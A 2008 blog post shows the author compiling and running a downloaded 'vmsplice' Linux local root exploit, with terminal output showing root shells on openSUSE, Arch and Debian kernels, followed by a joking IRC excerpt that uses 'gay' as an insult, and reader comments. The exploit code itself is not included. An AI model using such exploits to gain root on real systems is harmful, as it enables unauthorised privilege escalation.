Playing with local root exploit …

Posted by ionut
February 10, 2008

I downloaded a small root exploit and I tried it on my OpenSuse 10.3 machine. I can not say more, here is the result:


ionut@suse:~/Documents> uname -a
Linux suse 2.6.22.5-31-default #1 SMP 2007/09/21 22:29:00 UTC x86_64 GNU/Linux
ionut@suse:~/Documents> cat /etc/SuSE-release
openSUSE 10.3 (X86-64)
VERSION = 10.3
ionut@suse:~/Documents> gcc exploit.c -o exploit
ionut@suse:~/Documents> ./exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By xxxx
-----------------------------------
[+] mmap: 0x100000000000 .. 0x100000001000
[+] page: 0x100000000000
[+] page: 0x100000000038
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4038
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x2ad54ed52000 .. 0x2ad54ed84000
[+] root
suse:~/Documents #

It is so funny …
Update 1: a friend told me: “use BSD”, see here:

mitu: hm, seems to work
cmatei: now, remove all your files
dudu: now, stop being gay and use BSD
mitu: dudu, you mean linux is not BSD ?
mitu: they look the same
dudu: linux is to OSes what dacia is to cars
mitu: dacia is a car ?
dudu: my point exactly

Update 2: It seems that the exploit is working also on Arch Linux and Debian Stable see below (thanks to wonder)


[user@anaconda ~]$ ./test
-----------------------------------
Linux vmsplice Local Root Exploit
By xxxx
-----------------------------------
[+] addr: 0xc011e730
[+] root
[root@anaconda ~]# whoami
root
[root@anaconda ~]# uname -a
Linux anaconda 2.6.23-ARCH #1 SMP PREEMPT Tue Jan 15 06:34:36 UTC 2008
i686 AMD Athlon(tm) 64 X2 Dual Core Processor 4200+ AuthenticAMD GNU/Linux


user@naboo:~$ ./deb
-----------------------------------
Linux vmsplice Local Root Exploit
By xxxx
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e55000 .. 0xb7e87000
[+] root
root@naboo:~# uname -a
Linux naboo 2.6.18-6-686 #1 SMP Wed Jan 23 03:23:22 UTC 2008 i686 GNU/Linux
root@naboo:~# whoami
root

Linux

If you enjoyed this post, please consider to leave a comment or subscribe to the feed and get future articles delivered to your feed reader.

Comments
Comment by sim on February 18, 2008 @ 4:18 pm

Your friend is right! Now try that on OpenBSD! :)

PS I’m the one who posted the FreeBSD7 slideshow on slideshare.net. Nice blogg! :)

Comment by ionut on March 13, 2008 @ 12:18 am

thanks, and also for slideshow :)

Comment by abosalem on July 31, 2009 @ 4:59 pm

thank u 4 ma

Leave a comment

(required)

(required)